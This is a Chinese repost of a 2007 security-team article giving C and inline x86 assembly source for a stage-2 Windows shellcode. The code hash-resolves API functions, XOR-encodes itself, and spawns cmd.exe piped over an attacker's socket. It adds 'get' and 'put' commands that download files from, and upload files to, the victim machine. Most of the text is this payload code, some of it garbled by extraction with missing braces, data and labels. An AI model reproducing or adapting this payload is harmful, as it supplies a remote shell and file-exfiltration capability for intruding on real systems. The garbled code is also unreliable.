文件上传下载的shellcode 's

admin 2017年5月7日18:00:18评论567 views字数 16546阅读55分9秒阅读模式





shellcode是一项非常具有艺术性的工作,可以对shellcode做加密,可以自己在shellcode里实现 一个协议,可以直接执行一个PE文件,如果是IE里的,可以对抗主动防御,可以通用不挂浏览器,文件型的功能就更多了。



这段shellcode是一个stage2的shellcode。这种思想是分段发送shellcode,先发送stage1 的shellcode,然后stage1的shellcode会接收stage2 的shellcode去执行。一般来说stage1 的shellcode会短小精悍,stage2 的shellcode则会比较强大。下面的shellcode是stage 2 shellcode的演示.



author: [email protected]
Team: Ph4nt0m Security Team (http://www.ph4nt0m.org)
Date: 2007


#include <windows.h>
#include <stdio.h>

#define PROC_BEGIN __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90/
__asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90

#define Xor_key 0x33;

unsigned char sh_Buff[2048];
unsigned int sh_Len;
unsigned int Enc_key=0x99;

unsigned char decode1[] =
00401004   . /EB 0E         JMP SHORT encode.00401014
00401006   $ |5B            POP EBX
00401007   . |4B            DEC EBX
00401008   . |33C9          XOR ECX,ECX
0040100A   . |B1 FF         MOV CL,0FF
0040100C   > |80340B 99     XOR BYTE PTR DS:[EBX+ECX],99
00401010   .^|E2 FA         LOOPD SHORT encode.0040100C
00401012   . |EB 05         JMP SHORT encode.00401019
00401014   > /E8 EDFFFFFF   CALL encode.00401006
“/xFF”          // shellcode size
“/x99”          // xor byte

char decode2[] =
/* ripped from eyas
00406030   /EB 10           JMP SHORT 00406042
00406032   |5B              POP EBX
00406033   |4B              DEC EBX
00406034   |33C9            XOR ECX,ECX
00406036   |66:B9 6601      MOV CX,166
0040603A   |80340B 99       XOR BYTE PTR DS:[EBX+ECX],99
0040603E ^|E2 FA           LOOPD SHORT 0040603A
00406040   |EB 05           JMP SHORT 00406047
00406042   /E8 EBFFFFFF     CALL 00406032
“/x66/x01”      // shellcode size
“/x99”          // xor byte

// kernel32.dll functions index
#define _LoadLibraryA           0x00
#define _CreateProcessA         0x04
#define _TerminateProcess       0x08
//#define _ExitThread             0x08
#define _CreatePipe             0x0C
#define _CreateNamedPipeA       0x10
#define _CloseHandle            0x14
#define _CreateEventA           0x18
#define _WaitForMultipleObjects 0x1C
#define _GetOverlappedResult    0x20
#define _CreateFileA            0x24
#define _ReadFile               0x28
#define _WriteFile              0x2C
#define _WaitForSingleObjectEx 0x30
#define _Sleep                  0x34
// ws2_32.dll functions index
#define _WSAStartup             0x38
#define _WSASocketA             0x3C
#define _setsockopt             0x40
#define _bind                   0x44
#define _listen                 0x48
#define _accept                 0x4C
#define _recv                   0x50
#define _send                   0x54
#define _WSACreateEvent         0x58
#define _WSAEventSelect         0x5C
#define _WSAEnumNetworkEvents   0x60
#define _ioctlsocket            0x64
#define _closesocket            0x68
// data index
#define _lsck                   0x6C
#define _hsck                   0x70    // socket handle
#define _hin0                   0x74    // transferring data to subprocess. incoming handler
#define _hin1                   0x78    // outgoing
#define _hout0                  0x7C    // Create named pipe and open it. incoming handler
#define _hout1                  0x80    // outgoing
#define _pi0                    0x84
#define _pi1                    0x88
#define _epip                   0x8C
#define _esck                   0x90
#define _flg                    0x94
#define _lap                    0x98
#define _cnt                    0xAC
#define _pbuf                   0xB0
#define _sbuf                   0xF0

// functions number
#define _Knums                  14
#define _Wnums                  13

// Need functions
unsigned char functions[100][128] =
// kernel32
//    {“ExitThread”},

// ws2_32

// data

void PrintSc(unsigned char *lpBuff, int buffsize);
void ShellCode();

// Get function hash
unsigned long hash(unsigned char *c)
unsigned long h=0;
h = ( ( h << 25 ) | ( h >> 7 ) ) + *c++;
return h;

// get shellcode
void GetShellCode()
char *fnbgn_str=”/x90/x90/x90/x90/x90/x90/x90/x90/x90″;
char *fnend_str=”/x90/x90/x90/x90/x90/x90/x90/x90/x90″;
unsigned char *pSc_addr;
unsigned char pSc_Buff[2048];
unsigned int   MAX_Sc_Len=0x2000;
unsigned long dwHash[100];
unsigned int   dwHashSize;

int l,i,j,k;

// Get functions hash
for (i=0;;i++) {
if (functions[i][0] == ‘/x0’) break;

dwHash[i] = hash(functions[i]);
//fprintf(stderr, “%.8X/t%s/n”, dwHash[i], functions[i]);
dwHashSize = i*4;

// Deal with shellcode
pSc_addr = (unsigned char *)ShellCode;

for (k=0;k<MAX_Sc_Len;++k ) {
if(memcmp(pSc_addr+k,fnbgn_str, 8)==0) {
pSc_addr+=(k+8);   // start of the ShellCode

for (k=0;k<MAX_Sc_Len;++k) {
if(memcmp(pSc_addr+k,fnend_str, 8)==0) {
sh_Len=k; // length of the ShellCode

memcpy(pSc_Buff, pSc_addr, sh_Len);

// Add functions hash
memcpy(pSc_Buff+sh_Len, (unsigned char *)dwHash, dwHashSize);
sh_Len += dwHashSize;

//printf(“%d bytes shellcode/n”, sh_Len);
// print shellcode
//PrintSc(pSc_Buff, sh_Len);

// find xor byte
for(i=0xff; i>0; i–)
l = 0;
for(j=0; j<sh_Len; j++)
if (
//                   ((pSc_Buff[j] ^ i) == 0x26) ||    //%
//                   ((pSc_Buff[j] ^ i) == 0x3d) ||    //=
//                   ((pSc_Buff[j] ^ i) == 0x3f) ||    //?
//                   ((pSc_Buff[j] ^ i) == 0x40) ||    //@
((pSc_Buff[j] ^ i) == 0x00) //||
//                   ((pSc_Buff[j] ^ i) == 0x0D) ||
//                   ((pSc_Buff[j] ^ i) == 0x0A) ||
//                   ((pSc_Buff[j] ^ i) == 0x5C)

if (l==0)
Enc_key = i;
//printf(“Find XOR Byte: 0x%02X/n”, i);
for(j=0; j<sh_Len; j++)
pSc_Buff[j] ^= Enc_key;

break;                        // break when found xor byte

// No xor byte found
if (l!=0){
//fprintf(stderr, “No xor byte found!/n”);

sh_Len = 0;
else {
//fprintf(stderr, “Xor byte 0x%02X/n”, Enc_key);

// encode
if (sh_Len > 0xFF) {
*(unsigned short *)&decode2[8] = sh_Len;
*(unsigned char *)&decode2[13] = Enc_key;

memcpy(sh_Buff, decode2, sizeof(decode2)-1);
memcpy(sh_Buff+sizeof(decode2)-1, pSc_Buff, sh_Len);
sh_Len += sizeof(decode2)-1;
else {
*(unsigned char *)&decode1[7] = sh_Len;
*(unsigned char *)&decode1[11] = Enc_key;

memcpy(sh_Buff, decode1, sizeof(decode1)-1);
memcpy(sh_Buff+sizeof(decode1)-1, pSc_Buff, sh_Len);
sh_Len += sizeof(decode1)-1;

// print shellcode
void PrintSc(unsigned char *lpBuff, int buffsize)
int i,j;
char *p;
char msg[4];
printf(“/* %d bytes *//n”,buffsize);
for( p = msg, j=0; j < 4; p++, j++ )
printf(“%c”, _tolower(*p));
printf(“%c”, p[0]);
printf( “/”;/n”);

// shellcode function
void ShellCode()

PROC_BEGIN    //C macro to begin proc

jmp     locate_addr
pop     edi                             ; get eip
mov     dword ptr [edi+_hsck], eax      //保存stage1传来的socket handle

mov     eax, fs:30h
mov     eax, [eax+0Ch]
mov     esi, [eax+1Ch]
mov     ebp, [eax+8]                    ; base address of kernel32.dll

mov     esi, edi

push    _Knums
pop     ecx

GetKFuncAddr:                           ; find functions from kernel32.dll
call    find_hashfunc_addr
loop    GetKFuncAddr

push    3233h
push    5F327377h                       ; ws2_32
push    esp
call    dword ptr [esi+_LoadLibraryA]
mov     ebp, eax                        ; base address of ws2_32.dll
push    _Wnums
pop     ecx

GetWFuncAddr:                           ; find functions from ws2_32.dll
call    find_hashfunc_addr
loop    GetWFuncAddr

push    1                               ; sa.inherit=true
push    0                               ; sa.descriptor=NULL
push    0x0C                            ; sa.sizeof(sa)=0x0c
mov     ebx, esp

push    0xff
push    ebx
lea     edx, [esi+_hin0]
push    edx
add     edx, 4
push    edx
call    dword ptr [esi+_CreatePipe]

push    0x305C
push    0x65706970
push    0x5C2E5C5C                      ; “//./pipe/0″
mov     edi, esp

xor     eax, eax
push    eax
push    eax
push    eax
push    eax
push    0xff                            ; UNLIMITED_INSTANCES
push    eax                             ; TYPE_BYTE|READMODE_BYTE|WAIT
push    0x40000003                      ; ACCES_DUPLEX|FLAG_OVERLAPPED
push    edi                             ; pip=”//./pipe/0″
call    dword ptr [esi+_CreateNamedPipeA]
mov     [esi+_hout1], eax

xor     eax, eax
push    eax
push    eax
push    3                               ; OPEN_EXISTING
push    ebx                             ; lap
push    eax
push    0x02000000                      ; MAXIMUM_ALLOWED
push    edi                             ; pip=”//./pipe/0”
call    dword ptr [esi+_CreateFileA]
mov     [esi+_hout0], eax

push    646D63h                         ; “cmd”
lea     edx, [esp]

sub     esp, 54h
mov     edi, esp
push    14h
pop     ecx
xor     eax, eax
mov     [edi+ecx*4], eax
loop    stack_zero

mov     byte ptr [edi+10h], 44h         ; si.cb = sizeof(si)
inc     byte ptr [edi+3Ch]
inc     byte ptr [edi+3Dh]              ; si.flg=USESHOWWINDOW|USESTDHANDLES
push    [esi+_hin1]
pop     ebx
mov     [edi+48h], ebx                  ; si.stdinput
push    [esi+_hout0]
pop     ebx
mov     [edi+4Ch], ebx                  ; si.stdoutput
mov     [edi+50h], ebx                  ; si.stderror
lea     eax, [edi+10h]

push    edi
push    eax
push    ecx
push    ecx
push    ecx
push    1                               ; inherit=TRUE
push    ecx
push    ecx
push    edx                             ; “cmd”
push    ecx
call    dword ptr [esi+_CreateProcessA]

push    [edi]
pop     dword ptr [esi+_pi0]
push    [edi+4]
pop     dword ptr [esi+_pi1]

push    [esi+_hin1]
call    dword ptr [esi+_CloseHandle]
push    [esi+_hout0]
call    dword ptr [esi+_CloseHandle]

add     esp, 0x6C                       ; free sa struct and “//./pipe/0” string and si struct

xor     eax, eax
push    eax
push    1
push    1
push    eax
call    dword ptr [esi+_CreateEventA]
mov     [esi+_epip], eax

xor     ebx, ebx
mov     [esi+_lap+0x0C], ebx
mov     [esi+_lap+0x10], eax

call    dword ptr [esi+_WSACreateEvent]    // WSACreateEvent();
mov     [esi+_esck], eax
mov     dword ptr [esi+_flg], 0

push    0x21                            ; FD_READ|FD_CLOSE
push    [esi+_esck]
push    [esi+_hsck]
call    dword ptr [esi+_WSAEventSelect] // WSAEventSelect(_hsck, _esck, FD_READ|FD_CLOSE);

xor     eax, eax
dec     eax
push    eax
inc     eax
push    eax
lea     ebx, [esi+_epip]
push    ebx
push    2
call    dword ptr [esi+_WaitForMultipleObjects] // WaitForMultipleObjects(2, _epip, FALSE, INFINITE);
push    eax

lea     ebx, [esi+_sbuf]
push    ebx
push    [esi+_esck]
push    [esi+_hsck]
call    dword ptr [esi+_WSAEnumNetworkEvents] // WSAEnumNetworkEvents(_hsck, _esck, _sbuf);

push    0
push    dword ptr [esi+_esck]
push    dword ptr [esi+_hsck]
call    dword ptr [esi+_WSAEventSelect] // WSAEventSelect(_hsck, _esck, 0);

push    0
push    esp
push    0x8004667e
push    [esi+_hsck]
call    dword ptr [esi+_ioctlsocket]
pop     eax

pop     ecx                                     ;
jecxz   k2
dec     ecx
jnz     k5

push    0
push    0x40
lea     edx, [esi+_sbuf]
push    edx
push    [esi+_hsck]
call    dword ptr [esi+_recv]

lea     edx, [esi+_sbuf]
push    eax
pop     ecx          ;ecx字节数
call    xor_data

// Add file download and upload function
// 2004-06-09
// san
cmp     dword ptr [esi+_sbuf], 0xFF746567       ; “get ”
jz      get_file
cmp     dword ptr [esi+_sbuf], 0xFF747570       ; “put ”
jz      put_file
cmp     DWORD ptr [esi+_sbuf], 0x20786573       ; “sex ” sex加空格, 安全退出
jz      k5

push    0
lea     ebx, [esi+_cnt]
push    ebx
push    eax                                     ; size
lea     ebx, [esi+_sbuf]
push    ebx
push    [esi+_hin0]
call    [esi+_WriteFile]        // WriteFile(_hin0, _sbuf, len, _cnt);

mov     ecx, [esi+_flg]
jecxz   k3
push    eax
lea     ebx, [esi+_cnt]
push    ebx
lea     ebx, [esi+_lap]
push    ebx
push    [esi+_hout1]
call    dword ptr [esi+_GetOverlappedResult]
xchg    eax, ecx
jecxz   k5
jmp     k4

lea     ebx, [esi+_lap]
push    ebx
lea     ebx, [esi+_cnt]
push    ebx
push    0x40
lea     ebx, [esi+_pbuf]
push    ebx
push    [esi+_hout1]
call    dword ptr [esi+_ReadFile]
inc     dword ptr [esi+_flg]
test    eax, eax
jz      k1

lea     edx, [esi+_pbuf]
push    [esi+_cnt]
pop     ecx
call    xor_data

dec     dword ptr [esi+_flg]
push    0
mov     ebx, [esi+_cnt]
push    ebx
lea     ebx, [esi+_pbuf]
push    ebx
push    [esi+_hsck]
call    dword ptr [esi+_send]
jmp     k1

//int     3
//push    0         //应该可以没有
push    [esi+_pi0]                              // 进程 handler
call    dword ptr [esi+_TerminateProcess]       //结束掉cmd
//        call    dword ptr [esi+_ExitThread]
//        call    DWORD ptr [esi+_ExitProcess]

push    [esi+_pi0]
push    [esi+_pi1]
push    [esi+_hout1]
push    [esi+_hin0]
call    dword ptr [esi+_CloseHandle]
call    dword ptr [esi+_CloseHandle]
call    dword ptr [esi+_CloseHandle]
call    dword ptr [esi+_CloseHandle]

push    [esi+_hsck]
call    dword ptr [esi+_closesocket]

//    xor     eax, eax
//    dec     eax
//    push    eax
//    call    dword ptr [esi+_TerminateProcess]     结束当前进程
//        call    dword ptr [esi+_ExitThread]

// 返回stage1 恢复栈平衡
//int     3
add     esp, 8h

//int 3
mov     byte ptr [esi+_sbuf+eax-1], 0
lea     edx, [esi+_sbuf+4]              ; “get ” filename
xor     eax, eax
push    eax
push    eax
push    3                               ; OPEN_EXISTING
push    eax                             ; lap
push    eax
push    0x02000000                      ; MAXIMUM_ALLOWED
push    edx                                ; filename
call    dword ptr [esi+_CreateFileA]
//—- 判断文件打开是否成功——-
inc        eax
test    eax, eax
jz        k1
dec        eax
mov     [esi+_hout0], eax

push    0                               ; null or &lap
lea     edx, [esi+_cnt]
push    edx                             ; read size actualy
push    0x40                            ; read size
lea     edx, [esi+_pbuf]
push    edx
push    [esi+_hout0]
call    dword ptr [esi+_ReadFile]

mov     ecx, [esi+_cnt]
jecxz   transfer_finish                 ; None to read

lea     edx, [esi+_pbuf]
call    xor_data

push    0
push    [esi+_cnt]
lea     edx, [esi+_pbuf]
push    edx
push    [esi+_hsck]
call    dword ptr [esi+_send]

jmp     transfer

push    [esi+_hout0]
call    dword ptr [esi+_CloseHandle]

jmp     k1

//int 3
mov     byte ptr [esi+_sbuf+eax-1], 0
lea     edx, [esi+_sbuf+4]              ; filename after “put ”
xor     eax, eax
push    eax
push    eax
push    2                               ; CREATE_ALWAYS
push    eax                             ; lap
push    eax
push    0x02000000                      ; MAXIMUM_ALLOWED
push    edx                                ; filename
call    dword ptr [esi+_CreateFileA]
//—- 判断文件创建是否成功——-
//inc        eax
//test    eax, eax
//jz        k1
//dec        eax
mov     [esi+_hout0], eax

push    0
push    0x40
lea     edx, [esi+_pbuf]
push    edx
push    [esi+_hsck]
call    dword ptr [esi+_recv]        // recv(_hsck, _pbuf, 64, 0);
cmp     dword ptr [esi+_pbuf], 21444E45h // 判断结束字符串END!
jz      upload_finish
lea     edx, [esi+_pbuf]
push    eax
pop     ecx
call    xor_data                    // xor_data(_pbuf, len);
push    0
lea     edx, [esi+_cnt]
push    edx
push    eax
lea     edx, [esi+_pbuf]
push    edx
push    [esi+_hout0]
call    dword ptr [esi+_WriteFile]    // WriteFile(_hout0, _pbuf, len, _cnt, 0);

//push    0
//push    esp
//push    4004667Fh
//push    [esi+_hsck]
//call    dword ptr [esi+_ioctlsocket]    // ioctlsocket(_hsck, FIONREAD, &i); i = 0
//pop     ecx
//jecxz   upload_finish

jmp upload

//int 3
push    [esi+_hout0]
call    dword ptr [esi+_CloseHandle]    // CloseHandle(_hout0);
mov     byte ptr [esi+_sbuf], 0x0a
push    1
pop     eax
jmp     restore

dec     edx
xor     byte ptr [edx+ecx], Xor_key
loop    xor_work

push    ecx
push    esi
mov     esi, [ebp+3Ch]                  ; e_lfanew
mov     esi, [esi+ebp+78h]              ; ExportDirectory RVA
add     esi, ebp                        ; rva2va
push    esi
mov     esi, [esi+20h]                  ; AddressOfNames RVA
add     esi, ebp                        ; rva2va
xor     ecx, ecx
dec     ecx

inc     ecx
add     eax, ebp
xor     ebx, ebx

movsx   edx, byte ptr [eax]
cmp     dl, dh
jz      short find_addr
ror     ebx, 7                          ; hash
add     ebx, edx
inc     eax
jmp     short hash_loop

cmp     ebx, [edi]                      ; compare to hash
jnz     short find_start
pop     esi                             ; ExportDirectory
mov     ebx, [esi+24h]                  ; AddressOfNameOrdinals RVA
add     ebx, ebp                        ; rva2va
mov     cx, [ebx+ecx*2]                 ; FunctionOrdinal
mov     ebx, [esi+1Ch]                  ; AddressOfFunctions RVA
add     ebx, ebp                        ; rva2va
mov     eax, [ebx+ecx*4]                ; FunctionAddress RVA
add     eax, ebp                        ; rva2va
stosd                                   ; function address save to [edi]
pop     esi
pop     ecx

call    func_start

PROC_END      //C macro to end proc



int main(int argc, char *argv[])
unsigned char Buff[2048];


PrintSc(sh_Buff, sh_Len);

//PrintSc(Buff, sizeof(Buff));

return 1;

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  • 本文由 发表于 2017年5月7日18:00:18
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   文件上传下载的shellcode 'shttp://cn-sec.com/archives/46159.html


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